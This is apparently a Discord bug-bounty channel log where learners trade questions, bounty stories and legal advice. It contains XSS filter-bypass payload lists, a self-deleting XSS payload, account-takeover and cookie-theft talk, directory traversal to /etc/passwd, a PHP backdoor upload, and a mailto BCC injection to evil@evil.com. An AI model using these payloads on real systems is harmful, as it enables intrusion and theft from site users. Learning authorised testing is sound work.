#bug-bounty
Here's the summary (Twitter thread) of day 14 of my #100DaysOfHacking challenge
https://twitter.com/NjmUlSqb/status/1482041741670858753?s=20
Day 14 of #100DaysOfHacking
I touched a class of vulnerability today that I had absolutely no idea of, i.e. Broken OAuth
Read how OAuth 2.0 works and did a lab as well, I plan to complete the OAuth 2.0 section on @WebSecAcademy and then replicate and use the learnt skills ...
Does it take longer to respond when the severity of a bug is higher?
I've been waiting more than 3 workdays on a response
of 1-click account takeovers
Depends on the program. You tend to find the higher severity tends to get a faster response
Also depends on whether the program is managed by the client or by the platform
What are your thoughts on using Nessus during a bug hunting session? I mean, what if I could just deploy Nessus on a VPS, allow it to scan target subdomains provided as a file, wait one-two days for the vulnerability assessment to complete and then exploit it? Is that a feasible idea? Or am I just thinking it all wrong?
There’s nothing stopping you from doing it, but for the most part it won’t find anything
Have you tried it? Mind explaining? :)
@mighty wigeon most companies prior to pushing their web app to production, do required scans in a different environment and have test cases that the code must pass prior to it being pushed. Most bug bounty programs will want you to manually test the site because they assume that the security researcher will be more in-depth about edge cases and things that could break the web app than an automated scan
Here's the summary (Twitter thread) of day 15 of my #100DaysOfHacking challenge
https://twitter.com/NjmUlSqb/status/1482406196996943872?s=20
Day 15 of #100DaysOfHacking
Solved lab on implicit grant type in OAuth 2.0 on @WebSecAcademy, observed links generated by "Sign in with Google"/"Sign in with Microsoft 365" on target app.
OAuth 2.0 process is complex and lots of labs are available on it. I am working on ...
Thanks for this insight. :) I understand now
Chances are you’ll never find a bug, hundreds of people rely on tools like Nessus thinking it’ll be easy money. Shocker it’s not. The manual approach is the only real way of making money through bounties or automating stuff yourself
I didn't think of it as the easy money way. I thought that a vuln scanner would give me a competent opinion about the existence of a vulnerability. But thanks for providing me this insight. :)
Hey, anyone here want to become my partner to learn bug bounty together? DM if interested
Yes...@huehue
@glass ivy what skills do you need for a partner??? I am kind of a beginner
if that works for you
Same here we could work as three
I've done pentesting a bit but never bug bounties
What should I know about bug bounties and what is there to study before I do it? Is it different from pentesting, like if I know some pentesting skills can I do bug bounty, and what is a good site to start on bug bounty? Also, will bug bounties help me learn future skills?
@glass ivy I am interested in bug bounty learning, I am a complete beginner to it
https://link.medium.com/kZVjeZrbWmb is this legal?
I'd make an educated guess that bruteforcing every single subdomain and endpoint (especially when automated) causes service disturbance
Before starting bug bounty, you need the skills down.
People see dollar signs on big bounties and immediately jump to it. Don't do that.
You need to know what you're doing first, and even then you're not that likely to find anything.
Bug bounty isn't stable income like a job, but it's an OK side gig. You can spend 40 hours on an app and find nothing, and as such get nothing. You could find something big but get it closed as a duplicate.

in addition to that, flexes on social media about bug bounty money never include the amount of hours invested into finding a bug
so don't assume people find a $2,000 bug in an hour; they most likely spent dozens enumerating the website for attack vectors
Plus you don't hear about the small bounties. It's a massive reporting bias.
lmao new account takeover incoming
found a way to extract cookies using javascript while HTTPOnly was true
as I'm bypassing a 403 on the dev page listing the cookies and other sensitive debug data 
only issue is that the XSS requires the <>'s to be unencoded
but firefox auto encodes them
does anyone know a work around? when I don't encode it in firefox it works fine
curl/burp I think, I have no clue though
yeah they both work but I want a work around for browsers
so it's exploitable
using fetch() with Content-Type: application/x-www-form-urlencoded and a POST method bypasses it
but now you need to find a way to make it execute
maybe look for an extension
also I think a curl poc would be awesome to get
like it has all the relevant info
and is easier to reproduce
it needs to be exploitable from a user's POV
so the impact is higher
so I can do a 1-click or even a 0-click account takeover
a command is easier for a 1-click takeover I think
but try chromium based browsers
hm alright
'headless browsers' can be used for automating stuff like this but they're seldom used
I tried making an XSS fuzzer with one but couldn't fully understand it and gave up, I believe @worthy folio recommended it so he'd know more 🤷♂️
not that much more, I'd hook it up to puppeteer or selenium
🙂
Got a response yet?
yup
awarded as high
had to escalate severity twice though
they didn't like the account takeover
you? @stray tapir
No response yet
They fixed the reflected XSS that led up to it yesterday
oh nice, so they should respond soon
I HATE MYSELF LMFAOOO
TL;DR: told the account takeover guys to enable WAF
but now all my stacked bugs are rendered useless
shot myself in my foot big time 
could've squeezed another two unique account takeovers out of those

Here's the summary (Twitter thread) of day 20 of my #100DaysOfHacking challenge
https://twitter.com/NjmUlSqb/status/1484203142690529280?s=20
Day 20 of #100DaysOfHacking
First, let me tell you about that OTP case from yesterday. I noticed that it sent the same OTP to the same email address: as I deleted the account on that address and registered on it again, it sent the same OTP as the old one, though it's still a ...
@stray tapir is the WAF smth like Cloudflare?
You can find the origin - either 1) look at old IPs for that domain, or 2) sometimes there are subdomains which lead to the same website, but without CF
For 1) you can still request the files (you set the IP & Host header in the tools), for 2) you can even reproduce the XSS as a user, etc.
Yeah it's CF WAF
I know the pub and priv IP because of the dev page leak
let's see 
wth
they deactivated the WAF
wrote a report
sent it
everything has a POC with proof of it working
in before they reactivate the WAF
Is there any way to bypass Imperva?
I reported 5 vulnerabilities, all insufficient session expiration. All of them were considered duplicates. It sucks
First off, congrats! You found something! Remember a duplicate means you found a vuln, but someone beat you to it. You’re on the right track! This is all part of being a hunter.
With that said, go DEEPER. You come across more dupes when you focus on the easy and common stuff. Things like session expiration don’t always hold a lot of business impact. It’s easy to detect. It’s easy to report. Hence all the duping.
How could you leverage this in your kill chain to do more impactful damage? Are there any app logic bugs that are exacerbated because of the way they handle session management? If they already have this sort of vuln, what else might they not be handling? That is a good signal to look harder.
As for WAF bypass, check out https://github.com/0xInfection/Awesome-WAF as a starting point. Lots more you can Google on the topic, including specific payloads that could help. HTH.
Good luck! 🎉
Hello
How can I bypass <?php echo "lol"; ?> changing into <!--?php echo "lol"; ?-->?
should be noted that I have XSS and HTML injection on this page
but it's encoded as JSON hence I can't use "
because it gets changed to \"
looks like it only does it when it detects <?
<.?php echo "hi"; ?> doesn't get changed
Blacklist Bypasses
If some kind of blacklist is being used you could try to bypass it with some silly tricks:
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG
//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>
//You can substitute the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09
//Unexpected parent tags
<svg><x><script>alert('1')</x>
//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //
//Extra open
<<script>alert("XSS");//<</script>
//Just weird and unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">
//Using `` instead of parenthesis
onerror=alert`1`
//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
hm
<?<?php echo 1 ?> changes into <!--?<?php echo 1 ?-->
should I be expecting PHP execution at this point?
I was thinking <--><?php echo 1;><!--> but wasn't sure tbh
that changes into
```html
"...": "<-->
<!--?php echo 1;-->
<!--"}-->
```
hm
how does that even work
or is this a firefox thing
okay that's a firefox thing
bruh?
ig this isn't vulnerable
@swift grotto Thank you:)
I hope it's useful for new entrants
Is it possible to get stored XSS when you can't add anything to the page aside from params?
You tell us. Are the parameters you pass being stored somehow?
Can anyone help me please, I need IDOR scenarios?
Check console.log by inspecting; also pay attention to whether CSP blocks it or not
Hey guys, I have a question. What is the vulnerability type of "wp-content/debug.log"?
Can anyone help with this!!!
Account data web requests
account_id = 431 to account_id = 432 etc
perhaps even authentication bypass using cookies
Thank you 🤩
thank you
Quick question: Google single sign-on is not allowing me to intercept, how can I bypass it on Chromium?
man
I found the new OWASP Juiceshop
It's called OWASP Juice Shop prod edition™️

found a way to get unlimited stored XSS's on a website
unfiltered and everything
and available on every webpage
I truly, truly, truly wish the developers' pay checks would get decreased by these bounty payouts
because what they wrote is coming straight out of PHP hell
oh, and it's causing a client side DOS

Pretty sure you're not supposed to be disclosing this publicly smh
Especially with the GIF that you posted before 
What do you think smh
:pepemonkas:
🐦
Heyo all
Hello everyone, I have a question in my mind and I would be very happy if you can help. When I join a program on HackerOne, I download the Burp Suite config file of that program and add it to my project. When I visit a website within the scope of the program, the web address gives a 302 response and directs me to another address. I can't see any data in my HTTP history because the address I was directed to is not in the target addresses in the Burp Suite config file. Do I need to add this forwarded address to the target addresses in Burp Suite? For example: the domain address in Periscope is "https://google.com/" and I added this address to my Burp Suite target filter. But when I visit this address I am redirected to "https://www.google.com/" and my Burp Suite history data is empty
thanks mate!
Hi everyone, quick question: if you are able to disable your account's 2-factor authentication or add transactions or delete them through Burp Repeater, is this considered a vulnerability? I don't mean another account. I mean your own account.
Thank you in advance
Can you do it through the UI?
welp, I just reported the XSS bug to OWASP Juice Shop 2.0
issue is, I lost the payload I used in that image
I'd love to use an anime kms emote here but afaik I'll get muted :'(
Made a pretty funny XSS payload while testing it
'"><script>var+s=document.getElementsByTagName('script');var+e=s[s.length-1];console.log('Invisible+XSS+:poof:');e.parentNode.removeChild(e)</script><?
basically prints 'Invisible XSS :poof:' to the console and deletes the payload
and disguises the inline garbage from HTML using <?
What is UI?
Does anyone know how to get an email from Instagram? I tried Osintgram but didn't find anything useful
Did you try to find out before asking?
yes
Then you know it's User Interface, so in this case a rendered website.
Is it me or is bug bounty a bad name for bug bounties?
By saying bug you're saying they're paying for regular bugs like unintended behaviour in software
while it's more commonly security vulns
So I was digging into some spam emails and I think I found a way that the senders were able to bypass Gmail's spam filtering. Is this something that their Bug Hunters program would be interested in? There's a section on "abuse-related methodologies" but that seems to be focused on review manipulation. Does bypassing filters count as abuse?
Depends on how they did it, and if you can replicate it
Fair enough. It involved sending data in the body that was parsed by the filter but isn't being rendered by the client. Replicating should be doable but I haven't started on that yet
Hello, "x[dot]com", which is given as a single domain in the scope of a program, redirects me to "aaa[dot]x[dot]com" when I go to this address. Can I add this forwarded address to the Burp Suite target addresses? Because otherwise there is no data in Burp Suite. How should I handle this?
Directory traversal on a web application: I am able to retrieve the /etc/passwd file, but not the /etc/shadow file from the webserver. Syntax I am using: =../../../etc/shadow. Any ideas why this might be happening?
Because /etc/passwd is world-readable whereas /etc/shadow isn't
The user running the web server (e.g. apache, www-data) doesn't have access to it
Okay, thanks. I am logged in as admin and have uploaded a PHP backdoor; there is a file restriction in place that will only accept HTML files, so I changed the file from .php to .html, but I can't interact with the backdoor in order to ls the directories. Do you know of a workaround to get root on the file system?
First you gotta get RCE, then any privesc 😅
Try different file extensions supported by the web server (check response headers and error responses to know what server it is)
Like .php, .phtml, .inc
How do you have directory traversal and file inclusion?
Try source code disclosure for the .php file that you performed the upload on to figure out any bugs
It's Apache 2.4.29 on Ubuntu. Nmap scan shows SMB 445 as filtered; SSH is only accessible by private key so I can't brute force the creds with Hydra. Not much to go on. Thanks for your help, will keep researching as I go. Cheers
If there would be some platform where you can learn privilege escalation... 🤔
And bypassing file upload restriction...
Use TryHackMe and PortSwigger Academy @peak wharf. There's also a course by Tib3rius for learning privilege escalation. There are GitHub repos containing scripts which are used to set up an environment for you to learn different privilege escalation techniques
What's TryHackMe?
Ur trolling right? 😂
It's more a sarcasm than trolling.
Understood sir. :)
Hi. I’m getting started in bug bounties and I am currently doing the NahamStore exercise and I am stuck on Task 2. Can anyone help me please
Welp, now that I'm sick, let's see how many "sorry but this is a duplicate vulnerability" messages I can get within the next 5 days
Hey everyone, I have a question in my mind and it would be really helpful if the pro bug bounty hunters answered it. I started and currently it's my second year as a cybersecurity student and practitioner. I came to know about bug bounty a long time ago but never thought to actually do it myself. But lately I got a keen interest in them and I actually started learning from books, Medium etc. But TBH I can't focus on everything, like I have to do THM, HTB, PortSwigger, Hacker101 etc. every single day. If any of the pros can find the flaw and how it can be fixed... I think I should only do THM until I complete Real-World Bug Hunting; like if I do these two per day I think I would focus more on both.
I've never done a bug bounty but I've started looking at them. Question: does this mean any vulns found on exploit-db, Metasploit, published CVEs, etc. are out of scope?
No, that means if you can exploit it, you will be required to attach a proof of concept
That's basically saying, don't waste their time saying "You're running an outdated software package that's vulnerable to X" without having proof that it's vulnerable in the form of a working PoC
I am just getting started in bug bounties and I’m wanting to find a mentor to help me gain more knowledge with bounties and provide some structure to learning about vulnerabilities and such. Is there anyone who would be willing to mentor me?
Tbh, people are busy and there are slim chances you might find one. I suggest you check the pinned messages on this channel for more resources.
Ok thank you
No way
Hello everybody!!! I am a newbie in this field. Earlier I was in the medical stream but had an interest in coding and hacking stuff, so I finally decided to switch careers. I have completed 12th and have a basic level of knowledge about computers, like not that technical but pro level in the normal user community 😅. I have seen some YouTube videos and from that I know what things I should learn but I don't know where to start. Is there anybody who can personally suggest what I should learn and where I should start, and help me whenever I get stuck in something, like a mentor??? I have heard from every YouTuber that this cyber community is very helpful and people always help each other to whatever extent they can and you can easily find a mentor. So looking forward to help 😇 Also I am not that type of guy who keeps spamming you all day. I will just ask my doubts whenever I face any problem. So if somebody is there who can be my mentor, I will be delighted. 😇
Everyone is a mentor and a helper over here. Everyone can reply according to their own convenience
You just need to start learning and hacking!! Plenty of resources available but if you get overwhelmed, just ask anyone in this or #resources channel @solar perch
Just got 100 euros (~110 USD or so) for 7x reflected XSS and 2x reflected self-stored sitewide XSS which all lead to 1-click account takeovers, off program
got the same for two reflected XSS bugs at the same company earlier without acc takeovers, so I'm kind of feeling scammed but aye, I'm happy with it
probably at least 15 hours sank into it so I'm pretty happy
That's great man!
Congrats man share some tips
Find PHP sites without a CMS
100€ for all these bugs is a scam.

Well like I said, it was off program and took a bit of a risk
I'm happy I'm not getting sued lmao
oh ok nice
😛
So why were you attacking it
I asked beforehand
Noticed the site was spewing out user content and not filtering <>'s
And got a full, legal scoping document drawn up, I assume?
There's a reason pentesters don't do odd jobs -- it's the legal equivalent of balancing on one foot at the edge of a cliff with a black forest gateau in a hemispherical bowl on your head.
Be very glad you weren't sued, or charged by your local authorities for breach of whatever hacking laws you have locally. Verbal consent is not good enough for things like this, which is why pentests have strict documentation for it. An out-of-programme bounty hunter is in exactly the same boat.
Don't be a cowboy -- it gives everyone else a bad name
Ahh alright
Didn't think it would be interpreted like that because I'm just sending in a report without asking for anything for it
Just thought of it as free security advice on a website and no other systems
When in reality it's you attacking a public-facing resource with no formal consent or authorisation, which is in breach of pretty much any hacking law on the planet. It's the kind of thing people do jail time for 🤷♂️
"Free security advice" is a nice sentiment, but you're totally at the mercy of the owners of the website. If they decide to call the police, you have no legal protection. You can, and usually will, be criminally prosecuted for it.
It's the equivalent of breaking into someone's house then, when the police show up, claiming that you were only doing it to show them that their security is bad (then asking to be paid for doing it)
Hm I hadn't thought of it like that, yet
So I should just stick to RD / official bug bounty programmes?
i once did this too
made a file about all vulns
was thinking about emailing them with POC but....
Isn't it worse when you don't report those vulns?
or do you just hope they don't identify you
only if you publicize it and do malicious scanning, Burp modifications etc
or use known exploits
i think muiri knows better
Anything that has an official, scoped, bug bounty programme is fine (as long as you stay inside the scope). The fact that they have defined the scope and given a blanket permission gives you some legal protection, although even then it isn't unheard of to still be sued for it (which is why the big bounty hunting sites exist -- to act as a buffer and protect bounty hunters)
Basically. Once you've exploited a vulnerability you've committed a crime. You can tell them responsibly and hope they let you off, or not tell them at all and hope they don't notice, but either way it's criminal 🤷♂️
I suspect if you stumbled across something legitimately then you would be fine though. For example, searching a user database for someone called O'Hara and getting a MySQL error back (e.g. SQLi) is a totally legitimate use for the application and just allowed you to stumble across the flaw. Bit difficult to sue for that if you weren't acting maliciously or otherwise hunting for bugs.
Going outside of scope is illegal.
Bug Bounty is legal when you stay in scope, because you have permission from the site etc
It's mentioned below the programs on the bug hunting platform you choose the program from
It doesn’t have to be a bug bounty program. As long as they have a documented vulnerability disclosure policy that clearly describes scope and/or safe harbor. Ensure the company holds you harmless against reasonable assessment. No VDP/BBP, don’t touch it.
Sorry @hybrid orchid that was for @stray tapir . I know you know this stuff.
Also, if you find any personal information of any user they will be forced to report it as a 'data breach'
Has someone attempted to automate Shodan recon like we can automate GitHub recon using gitgraber and slackcat? I am just interested to know if Shodan recon automation is a possibility..
It has an API and a command line; it's certainly possible to automate it
If it’s done, I’ll do a good writeup
anyone have the link for a really good CVE list platform?
MITRE exists?
A URL parameter payload gives a Cloudflare 520 unknown error code. Any clue???
is the report from Burp Suite enough to make a report? asking for a friend
most of the infosec blogs count automated bug scanners as bug bounty tools; my question is, do automated scanners really help in finding bugs on the web?
I mean tools like ZAP, Wapiti, Burp Suite scanner ...
No it isn't, you need to be able to demonstrate impact beyond "Burp Suite produced this alert saying webapp x is vulnerable to y"
They can certainly help but the best scanners are custom made to include vulnerabilities that common scans don't detect
yeah right! thanks
Thanks. Yes, of course I have to demonstrate, but the way Burp Suite reports is standard, right? Coz I am lazy
Don't be surprised if you end up having to re-write your entire report. Being lazy doesn't exactly get you anywhere
happened many times lol
I'm not sure if this is the right place to ask, but still, I found a bug that I'm 99% sure has no security issues (Instagram), where should I report it?
The SRT waitlist takes < a month at most
Smart people would find an existing member to refer them to bypass it 😂😂
Hello bro plz refer me sir
Hi guys, I have a question
Regarding a bug 🐞
I'm new to bug bounty so I am confused whether to report it or not
Which
403 bypass
When I send a GET request, in the response I am getting a 403 response code
But when I change the GET method to the OPTIONS method it is showing a 200 response code
But when I open the response in the browser it's just showing a blank page.
OPTIONS will just return the possible request methods, similar to how HEAD requests can be used to bypass 403
Unless you can exfil any sort of data from it, chances are it won't be accepted
I think it could be

😄
ay 👋
OPTIONS is just the preflight request, you most likely won't be able to exfiltrate data from it.
It always depends on the content it finds inside
anyway, I sent my request to Synack and they said that I'm eligible but I'm currently on the waiting list.. This was one month ago, do I need to wait so much? @native token (sorry for ping)
Chances are a 200 with a blank page isn't gonna pay out; that's a low at best, informational on all else
What are the good tools for web scanning other than Burp, ZAP, Nikto, Nessus, and hakrawler?
If you're doing bug bounty, there isn't a good web scanner
I had good scanner, but he asked for a salary rise, and I let him go. 😦
Anyway, I had an idea just recently. What if you are a programmer, you know about CSRF. So you check to which IP the domain resolves, and you either block it or allow it. And if it's OK, you send it further to the application, where it gets resolved again, but this time to a different IP.
And that, kids, was how I re-invented DNS rebinding 😮
Question: What will I invent next week?
Another bypass would of course be a redirect to an internal IP range / a domain pointing to an internal range. Or even a simple <meta> / JS redirect in the case of a rendered HTML page, but then you would probably have other interesting stuff to do.
Why only a handful of security researchers and bounty hunters make it and how can you be one of them?
Free coding platforms:
https://freecodecamp.org
https://edabit.com
https://codewars.com
Free books:
https://www.py4e.com/book.php
https://www.golang-book.com/books/intro
https://books.goalkicker.com/BashBook/
Recon in Cyberse...

if we pentest a company in an unpaid bug bounty, and we find a bug, do we still get paid?
In a pentest you are paid for the pentest process itself, not for found bugs.
There might be a pentest contract addition for actual findings, but that isn't a concern of the pentester; that's more of a contract negotiation thing.
@analog glen as an extra reward, or getting paid only if something is found?
As a bonus. A pentest on a contract is always going to be that contract's base pay.
#cyber-and-careers if you have further questions 🙂
hello
guys
my friend and I need some people for a CTF team
so anyone in?
please DM
This channel isn't for looking for CTF teams
Hi everyone! Is there a chance of any type of injection (XSS, command, etc.) if I can dynamically place some strings between mailto:'' ?
Actually mailto:'{handle}' is being dynamically loaded, so can I place some malicious string in handle?
I tried mailto:'n@n.com;alert(1)' but the whole string ends up in the TO section of the default mail handler
Do you have to be a fully skilled computer programmer or at least have some skill at computer programming to be a bug hunter?
epic.. xD
I think it is not necessary.. You must be good at reading various programming languages..
There are various techniques to do this, automation for example.. Many people manage to find many bugs only thanks to automation.. Without going to find them manually. It depends. The more general concept, however, is to know as many web-level attacks as possible: auth, various bypasses, etc.
Study the application well. Understand the mechanisms of the application in front of you, how it is structured, the times it has to do certain things.
Know at least the most frequent attacks very well: XSS, CSRF, SQLi.
I think one of the best courses is OSWA, I'm studying it right now.
@old umbra please don't post black or grey hat hacking. You might think it's morally justified to hack scammers but it is still illegal and therefore not tolerated here.
sorry :S
Watch some videos from NahamSec, he asks this question to every guest. And most of the time, the answer is ||how about you watch it, if you are interested in this field?||
it.is@unsecured.company?subject=possible
But I guess you need to check what is actually escaped, etc. It seems you don't end the ' there, at least.
Also, if it's done in some frontend rendering, e.g. React/Angular and so on, it might not be executed.
Very generic question without example 🙂
It's probably better if you invite someone to collab with you.
This seems to be the only possible issue, the ability to add BCC
Yes, it's an Angular app, forget about this one. If I get some javascript:alert(1) placed in location.href will it be executed?
I don't know, did you try it?
I am finding the entry point 😛
Actually, if you add something like mailto:'victim@victim.com?bcc=evil@evil.com', a blind carbon copy will be sent to the bcc address
You willing for collab? 😛
hmmm, never thought about that 🤔 will need to try it somewhere. nice.
thanks, but I'm busy. 🙂
bcc is a vuln?
if they never implemented it?
Think about the CIA triad.
If you can get a copy of each email sent without the recipient knowing, that's a confidentiality issue.
I thought so too, but I also thought it was possible for some company to use it.
Yes, but this case is a possible injection of a bcc
Do you think it is possible as a medium or high vuln?
Do those include the people that get paid thousands of dollars for finding bugs for large corporations and who enter those hacking competitions?
I'm not a bug bounty hunter ¯\_(ツ)_/¯
Is there any specific name for the convention of writing JS like javascript:alert(1) with a colon?
I am trying to study this in depth to see what sort of payloads can be made with it
I expect these guys will be asking how I can learn programming instead of whether I have to.
they should. programming is awesome
So, what was your question? 😄
I wanna cry

Omg, chicken nuggets. Envy, bro.

Voooodkaa
I got a CVE-2021-43798 on a Grafana instance on Google Cloud. But the problem is that it belongs to a Google Cloud customer. So I reported it to Google Cloud Compliance. Any chance it will be considered valid?
d
i
nope
ck
Do y'all do manual testing on CMS sites like WordPress and Drupal? I've never found any exploits / bugs that weren't listed by wpscan and droopescan
I don't think many CMS sites would inject their own insecure PHP code
You'd be surprised. Developers are humans. Humans make mistakes.
If you are getting serious about hunting bounties on popular CMS, consider looking through diffs between versions and look for the newest / latest code being introduced. See what they are "fixing" or "adding", and see how it impacts other things. Look for patterns; devs are creatures of habit, and if they are fixing one vuln somewhere, the class of vuln may exist elsewhere in the codebase. I got a couple of larger bounties in one web app because devs had cut/paste code segments.... fixing it in one spot but not others. The logic bug allowed me to use that in a more complex kill chain that got me a critical because of it. Don't fret about the low-hanging stuff wpscan etc. can find. Look at the actual code base holistically. You'd be surprised what you find.
I was originally talking about the websites running the CMS instead of the CMS itself, but that's some solid advice, I'll check it out
tbh if you're testing a website running a CMS the best approach is to find out the version and download the source if it's available
I feel Bugcrowd responders use double standards. I reported an issue they marked as not applicable and said how attackers would find the user’s token.
I work as an app security engineer and validate submissions from bugcrowd, and their bugcrowd responders never ask this question. They usually create a blocker.
I just wanted to know. Sometimes they act as if we are owed to them.
Yeah they are hypocritical
Someone is going to create a blocker after they read your email
Or you can go for an appeal
let me rephrase that: Another ASE is going to look at your report and may create a blocker or validate it.
As I said, I also validate submissions internally; every day I see how Bugcrowd researchers work
Welcome to the world of bug bounty-
If you can't demonstrate how an attacker could exploit something every step of the way, including obtaining that user's token, you aren't getting anywhere
Complaining about it in a discord completely unrelated to bugcrowd isn't going to help you at any point, regardless as to whether you verify submissions internally or not
**** FINALLY GOT MY FIRST REPORT RESOLVED ****
I am happy to announce that my first report has been closed as resolved, which is a high severity finding.
Here's the summary ( Twitter thread ) of day 46 of my #100DaysOfHacking challenge
https://twitter.com/NjmUlSqb/status/1493599291763564546?s=20&t=hRV_Oh1ggYAzxESoUgTiaA
Day 46 of #100DaysOfHacking
Big day for me!
On day 31, I submitted an IDOR bug to the program https://t.co/xbvOj0OksA and I was pretty sure about the bug's validity. After that day I was continuously checking for email (even at midnight) to see if the triager has responded ...
Noice
You might be right, however I have seen the Bugcrowd team don't ask bug hunters how an attacker would find another user’s token when an IDOR vulnerability comes; they just validate it. I know what I am talking about and I'm seeing this every day
Did they ask you how you found the victim’s token?
Then refer to my second point- moaning in here won't do anything.
As someone who frequently deals with hackerone, bugcrowd and SRT the common point for all platforms is you have to prove impact and exploitability.
Blindly saying "Acquire user token" doesn't fly and I've had reports rejected for that.
Take a step back, find a way of obtaining a user token and try again
Reporting without a method of acquiring a token is a roulette wheel, no different to xmlrpc submissions
You're moaning here, not me. I am saying my opinion on it and I am right.
I found the token in local storage; the user token is leaked in local storage.
Your user token or another user?
How do you test IDOR? You need two accounts.
Starting to think you're fire drago on an alt
Attacker and victim (User A and B)
I don’t understand your urban words and at the same time it is not funny. I found an IDOR and added my proof of concept; a Bugcrowd team member, without checking details or creating a blocker, marked it as not applicable.
What?

Yea not quite seeing the reason for a ping
Was Fire drago banned or something?
Nah he was just delusional
😂 I see.
No.
They marked my report as not applicable because of this token
I have been hunting for past 46 days continuously as I am having a #100DaysOfHacking challenge. I got my first bounty today for a high severity bug. It feels so good.
Follow me on this hacking journey as I share my progress daily on twitter
https://twitter.com/NjmUlSqb/status/1493599291763564546?s=20&t=hRV_Oh1ggYAzxESoUgTiaA
Tokens usually have high entropy. So yeah that was on the cards
lmao unless you can find another way of obtaining the token other than access to a user's device to extract from local storage, you're really stretching

How hard is it to start hunting?
I’m in high school and thought it would be a fun side job
Eh, I don't think you can really call it a job.
You can but it’s going to be hard to get to that point. There are “professional bug hunters” who work for large companies and get paid to find bugs, as well as for the bugs they find. It’s just not easy to get there
By paid I mean hourly
It would be easy if there were less/no competition
You can focus on less-focused-on assets/targets
I have seen some pretty cool bugs on the games side
Doing bug bounties at high school isn't that bad? I think that is when you are around 16
I think you should give it a go if your focus isn't getting money / feeding yourself
Bug bounties are risky for people that are required to make X monthly from it. But if you are a high school student that has about 0 expenses, messing with BB isn't that bad
HI
yo
Hey, I'm wondering how bug bounties actually work. What is stopping a company from reading your report, fixing the bug, then not acknowledging your work?
I've seen some people say it does happen.
I think it's harder for companies to do that if you use a bug bounty platform?
Not much. Trust/reputation really. Not much else.
Having the bug bounty platform there makes it better, the platform has a bit more weight in arguing
Ahh I understand, thanks for the info!
When I tried BB for the first time, I got a few "no impact" responses, but of course it got fixed :))
Which, yeah, I understand, does not necessarily go against each other.
@fallen palm
can someone confirm what exactly below regex indicates
(REGEXP_CONTAINS(path, r'(\/(?i)siteba[a-z0-9A-Z]+\.zip|^siteba[a-z0-9A-Z]+\.zip)'))
I understand this part siteba[a-z0-9A-Z]+\.zip but don't know why it is written twice
We are looking for some missing alphabets in - siteba<missing alphabets here>.zip
I believe the first one using \/(?i) escapes / in front of "siteba" and turns on case insensitivity, while the second one is saying the beginning of the line must match "siteba..."
@fringe sandal you can also check it on https://regex101.com/
thanks a lot for this explanation!
Gave +1 Rep to @zinc vale
thanks for sharing, it seems to be really useful.
-ban @dull eagle -ddays 1 Immediately inappropriate and trolling.
🔨 Banned Business Zeus#0999 indefinitely
Hello Everyone,
I have made an automated recon web application that anyone can deploy on Heroku for free. It is purely designed to be hosted on Heroku; since Heroku is a free hosting platform, it's a free alternative to a VPS
This is absolutely crazy, how long did it take?
Thank you 😇
Gave +1 Rep to @opal meteor
It took 4 months to complete
Share max if you like it ✌️
I'm defo using it and I just starred it on github haha
I'll see how well it works and if it's as awesome as it looks I will really recommend it haha
✌️👍
Yo I have a couple of questions regarding this tool, may I DM you?
Static analysis
Data is read from document.cookie and passed to the 'innerHTML' property of a DOM element via the following statements:
var results = document.cookie.match('(^|;)\x20?' + a_cookie_name + '='+r4c+'(;|$)');
return (decodeURIComponent(results[2]));
var display_session = get_cookie("LastMRH_Session");
document.getElementById("sessionDIV").innerHTML = '<BR>The session reference number: ' + display_session + '<BR><BR>';
how do I exploit this DOM XSS?
Think what’s user controllable, and then think how you could get that data to the statements. And then think if there’s a way to exploit that.
Yes sure anytime
Thanks!
Gave +1 Rep to @marble tapir
can someone provide the code for the file needed to create malicious packages in Java and Ruby (dependency confusion)?
Do a google search = dependency confusion github
They're all on npm or pip.
Anyone know how to exploit or find SQL injection via a parameter? Not a login page.
A lot of people know how to identify and exploit that. The real question is, do you know how to do that?
Head over to portswigger academy and educate on it, it'll make sense and sink in
SQLI is very well documented
Exactly, also there is a roadmap and everything is for free. And SQLi vulnerability is in fact in the 1st place of the roadmap. Great resource.
Hey guys, I switched a POST parameter (in the below error message, the POST parameter I changed is called messages) from a string to an array, and got this error
javax.ws.rs.ProcessingException: RESTEASY008200: JSON Binding deserialization error: javax.json.bind.JsonbException: Unable to deserialize property 'messages' because of: Can't deserialize JSON array into: class java.lang.String
Any ideas what more I can try next?
@fluid hare This channel is for bug bounty...
@native token 👍
Hello guys anybody to help with PDFs please
if that's not wanted just delete it, but I guess it's the right place https://hackenproof.com/ukraine-will-win/call-for-ukrainian-cyber-defense-stop-the-war
@young spoke Where does hacktivism come on THM ruling? Ignore, thought it was the hack Russia one again- Turns out this one looks legit for Ukraine defence
me smooth brain this morning
This was brought up in General a few days ago, I pinged James just in case.
All good, I read it the same way too haha
but ftr the ruling is that we don't condone it and people should be aware of the legal implications of doing stuff like that (i mean esp. if you're going after a state power currently at war) so we try to keep it out of here as best as possible (:
Can't really be seen as a recruiting grounds but we don't go mental about handling it
Please guys, where can I get a well paying job in cyber security or do bugbounty well
Not helping!
Buddy all the resources are available and are just a simple Google search away.. Follow Rachel Bicknell on Linkedin, she posts about jobs and internships. Use Linkedin more! Resources are available freely everywhere
Hi everybody, I’m new here!
I’m a software engineer transitioning to cybersecurity. I know about SQL inj, XSS and other basic exploits, and I’m looking to start with bug bounties, but how do you get over the slump of the first times when you cannot find any vuln in the apps you’re testing?
I feel like I’ll never be able to complete bounties 
Tryharder mindset😁
realistically how much skill/knowledge/experience is required to be successful at bug bounties?
@alpine robin 😆 true, it’s the feeling that I have not been a noob at something IT for so long, that not being able to do it feels overwhelming haha
This channel is for bug bounty specifically, you can read through #start-here if you want to understand the discord and what it's for.
Couldn't find anything about bug bounty in #start-here
Hey, you can read what the channel is for in the channel topic :)
some bug hunters hunting MAGENTO-CVE-2022-24086 here?
Hi , can anyone direct me to some premium labs to practice bug bounty?
Damn bounty hunting could be really excruciating. 3 dupes today lmao
